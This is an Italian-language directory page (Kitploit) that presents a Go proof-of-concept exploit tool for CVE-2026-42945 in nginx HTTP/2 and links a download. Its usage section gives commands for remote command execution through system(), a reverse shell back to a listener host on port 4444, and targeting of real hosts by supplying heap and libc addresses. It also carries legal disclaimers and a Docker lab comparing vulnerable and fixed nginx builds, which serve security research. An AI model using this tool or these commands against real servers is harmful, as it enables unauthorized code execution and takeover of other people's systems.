Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/redcrazyghost/cve-2026-42945
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebFuzzingPenetration TestingBinary Exploitation
GitHubredcrazyghost/cve-2026-42945

CVE-2026-42945

Strumento PoC basato su Go per CVE-2026-42945 (nginx HTTP/2) con capacità di rilevamento, test di crash, esecuzione di comandi e reverse shell in ambienti autorizzati.

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-42945 PoC(Go)

Italiano | English

Strumento di rilevamento e sfruttamento ausiliario per l'implementazione di nginx HTTP/2 (CVE-2026-42945), utilizzato per verificare la presenza della vulnerabilità in ambienti autorizzati, confrontare gli effetti delle correzioni e riprodurre il comportamento del PoC in un ambiente sperimentale controllato.

Versioni interessate (stima): nginx 0.6.27 – 1.30.0; 1.30.1+ / 1.31.0+ sono state corrette.


⚠️ Dichiarazione di esonero di responsabilità (leggere attentamente)

Questo repository è destinato esclusivamente a scopi di ricerca sulla sicurezza, verifica delle vulnerabilità e test difensivi.

  1. Autorizzazione legale: puoi utilizzare questo strumento solo su sistemi per i quali hai esplicita autorizzazione scritta o che sono di tua completa proprietà. Scansionare, sondare o attaccare reti/server altrui senza autorizzazione è illegale. Gli autori e i collaboratori non si assumono alcuna responsabilità legale.
  2. Rischio personale: il processo di sfruttamento potrebbe causare il crash del worker del servizio target, interruzioni del servizio o danni ai dati. Devi valutare l'impatto e verificare prima in un ambiente isolato.
  3. Nessuna garanzia: questo strumento viene fornito 'così com'è', senza garanzia di sfruttamento riuscito in alcun ambiente di produzione reale; i risultati del canale laterale non equivalgono a un RCE riuscito, deve essere verificato indipendentemente tramite scrittura di file, echo di comandi o reverse shell.
  4. Divieto di abuso: è vietato utilizzare questo strumento per penetrare sistemi non autorizzati, ransomware, distruzione, mining o qualsiasi scopo illegale. Scaricare, compilare o utilizzare implica che hai letto e accetti questa dichiarazione.
  5. Non affiliato con NGINX ufficiale: questo progetto è un'implementazione di ricerca indipendente e non rappresenta la posizione di NGINX ufficiale o di qualsiasi produttore.

Se non accetti i termini di cui sopra, interrompi immediatamente l'uso ed elimina questo repository.


Panoramica delle funzionalità


Requisiti di ambiente

  • Go ≥ 1.26 (vedi go.mod)
  • Opzionale: Docker + docker compose (ambiente sperimentale locale)
  • Opzionale: make, golangci-lint (sviluppo/controllo codice)
  • Verifica dello sfruttamento: il target deve esporre gli endpoint necessari per il PoC (GET /api/, POST /spray ecc.); le immagini Docker sperimentali lo contengono già

Limitazioni e ambiente applicabile


Compilazione

root@kitploit:~
# Costruzione rapida (output in bin/, già in .gitignore)
make build-cmd

# Oppure direttamente con go
go build -o ./bin/cve-2026-42945 ./cmd

# Visualizza versione incorporata
./bin/cve-2026-42945 -version

Binari pubblicati: scarica cve-2026-42945-<os>-<arch> per la tua piattaforma dalle Release (costruiti automaticamente da GitHub Actions dopo il push di un tag v*).


Guida all'uso

Parametri della riga di comando

root@kitploit:~
-target string      IP/nome host target (default 127.0.0.1)
-port int           Porta target (0=80; versione vulnerabile Docker usa solitamente 19321)
-docker             Test ambiente sperimentale Docker locale (vuln:19321, fixed:19331)
-check-only         Solo rilevamento, nessun traffico exploit
-probe-crash        Rilevamento overflow + canale laterale crash worker
-cmd string         Comando eseguito tramite system()
-shell              Reverse shell (richiede -lhost)
-lhost string       IP locale per reverse shell
-lport int          Porta locale per reverse shell (default 4444)
-docker-profile     Usa indirizzi heap/libc misurati da deploy/docker
-heap-base string   Indirizzo heap (hex, es. 0x555555659000)
-libc-base string   Indirizzo libc (hex)
-tries int          Numero di tentativi per candidato heap (default 10)
-timeout int        Timeout HTTP in secondi (default 5)
-v                  Output dettagliato
-version            Mostra versione ed esce

La modalità -docker non può essere usata insieme a -cmd / -shell; per lo sfruttamento su singolo target specificare -port 19321.

1. Solo rilevamento del target

root@kitploit:~
./bin/cve-2026-42945 -target 192.168.1.10 -port 80 -check-only

2. Canale laterale di crash (singolo target)

root@kitploit:~
./bin/cve-2026-42945 -port 19321 -probe-crash -v

3. Confronto ambiente sperimentale Docker

Avvia prima i contenitori sperimentali:

root@kitploit:~
make docker-up
# oppure
docker compose -f deploy/docker-compose.yml up -d --build

La prima compilazione richiede la compilazione di nginx, potrebbero volerci alcuni minuti; attendere che i servizi siano healthy in docker compose ps prima di eseguire make test-lab.

ServizioPortaDescrizione
vuln19321nginx 1.30.0 (vulnerabile)
fixed19331nginx 1.30.1 (corretto)

Rilevamento batch:

root@kitploit:~
./bin/cve-2026-42945 -docker -check-only
./bin/cve-2026-42945 -docker -probe-crash

Oppure usando i target Makefile:

root@kitploit:~
make test-lab          # check + probe
make cmd-exploit       # Scrive /tmp/pwned sul contenitore vuln e mostra comandi di verifica

4. Esecuzione comando su Docker vuln (verifica RCE)

Il contenitore sperimentale ha la massima probabilità di successo con ASLR disabilitata (setarch -R) e usando -docker-profile per indirizzi preimpostati:

root@kitploit:~
./bin/cve-2026-42945 -port 19321 -docker-profile \
  -cmd 'echo pwned > /tmp/pwned' -v

# Verifica se il file è stato scritto
docker exec nginx-rift-vuln-1.30.0 cat /tmp/pwned

5. Reverse shell

root@kitploit:~
# Terminale 1: avvia lo strumento (prova ad ascoltare in background con nc)
./bin/cve-2026-42945 -port 19321 -docker-profile -shell -lhost 10.0.0.5 -lport 4444 -v

# Se nc non viene trovato, apri un altro terminale e ascolta manualmente:
nc -lvnp 4444

6. Layout di memoria personalizzato

Se il target reale ha ASLR, versione libc diversa da Docker, è necessario divulgare o stimare gli indirizzi:

root@kitploit:~
# Il target deve essere una porta HTTP in chiaro (non TLS)
./bin/cve-2026-42945 -target TARGET -port 8080 \
  -heap-base 0x555555659000 \
  -libc-base 0x7ffff77ba000 \
  -cmd 'id' -tries 20 -v

Interpretazione dei risultati

  • [+] Canale laterale: worker anomalo: indica solo che il worker potrebbe essere andato in crash a causa di un overflow, non può essere considerato da solo come prova di RCE riuscito.
  • È necessaria una seconda verifica: controllare gli effetti collaterali del comando (file, processi, docker exec ecc.).
  • Cause comuni di fallimento: ASLR attivo, offset heap/libc errati, endpoint PoC non disponibili, WAF/limitazione di velocità, contenitore da riavviare.

Struttura del progetto

root@kitploit:~
cmd/                 Entry point del programma principale
internal/rift/       Logica di rilevamento, costruzione payload e sfruttamento
deploy/docker/       Immagini sperimentali nginx 1.30.0 / 1.30.1
deploy/docker-compose.yml
.github/workflows/   Build multi-piattaforma per le Release

Sviluppo

root@kitploit:~
make help            # Mostra tutti i target make
make test            # Test unitari
make lint            # golangci-lint
make version         # Mostra il numero di versione corrente

Pubblicazione nuova versione:

root@kitploit:~
git tag v1.0.0
git push origin v1.0.0

Riferimenti

  • Repository: https://github.com/RedCrazyGhost/CVE-2026-42945
  • CVE: CVE-2026-42945 (vulnerabilità relativa a nginx HTTP/2, fare riferimento agli annunci ufficiali)
  • Licenza: MIT License
  • Problemi di sicurezza: SECURITY.md

Promemoria

Usa questo strumento solo su sistemi che hai il diritto di testare. Qualsiasi abuso non è responsabilità degli autori.

Scarica lo strumento
ModalitàDescrizione
-check-onlyProva di connettività, header Server, stima versione, rilevamento endpoint PoC
-probe-crashInvia un ciclo di rilevamento overflow, determina tramite canale laterale di crash del worker
-cmdCostruisce il payload exploit, esegue il comando specificato tramite system()
-shellReverse shell (richiede -lhost, host locale deve avere nc)
-dockerTest batch dell'ambiente sperimentale Docker locale (vuln / fixed)
ElementoDescrizione
Protocollosupporta solo HTTP in chiaro (net.Dial + byte HTTP grezzi), non supporta HTTPS/TLS. Per porte TLS come -port 443, è necessario un terminatore TLS a monte o utilizzare una porta HTTP.
Docker sperimentalele immagini sono linux/amd64, il primo docker compose build richiede la compilazione di nginx dal sorgente, ci vuole tempo; all'interno del contenitore viene usato setarch -R per disabilitare ASLR, molto diverso dall'ambiente di produzione.
Apple SiliconDocker locale emula con platform: linux/amd64, più lento.
Reverse shell-shell dipende da nc di sistema, su Windows si consiglia di ascoltare manualmente.
Verifica dello sfruttamentoil canale laterale (crash del worker) non equivale a RCE, è necessario verificare indipendentemente gli effetti collaterali del comando.